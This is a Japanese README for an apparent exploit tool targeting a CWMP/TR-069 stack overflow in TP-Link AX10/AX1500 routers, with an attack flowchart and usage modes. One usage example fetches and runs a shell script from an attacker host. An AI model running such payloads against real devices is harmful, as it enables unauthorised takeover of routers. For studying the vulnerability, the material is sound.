
TP-Link AX10/AX1500におけるCWMP (TR-069)のスタックバッファオーバーフローのエクスプロイト。ret2libcによるASLR回避を伴うリモートコード実行を可能にします。チェックのみ、DoS、コマンド実行モードを含みます。
TP-Link AX10/AX1500 CWMP バッファオーバーフロー RCE
CWMP (TR-069) におけるスタックバッファオーバーフローにより、リモートコード実行が可能になります。
| フィールド | 値 |
|---|---|
| 製品 | TP-Link AX10, AX1500 |
| 影響を受けるバージョン | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (高) |
| タイプ | スタックバッファオーバーフロー |
| ベクトル | CWMP/TR-069 (ポート 7547) |
| 影響 | リモートコード実行 |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
脆弱性は、cwmp プロセスが SetParameterValues SOAP リクエストを処理する際に存在します。入力がバッファサイズの計算に使用されますが、境界チェックが行われません。
エクスプロイト:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
なし(標準ライブラリを使用)
許可されたセキュリティテストのみに使用すること。
| フラグ | 説明 | デフォルト値 |
|---|
-p, --port | CWMP ポート | 7547 |
-c, --command | RCE 用のコマンド | なし |
-t, --timeout | ソケットタイムアウト | 10 |
--dos | DoS モードのみ | オフ |
--check-only | 脆弱性の確認のみ | オフ |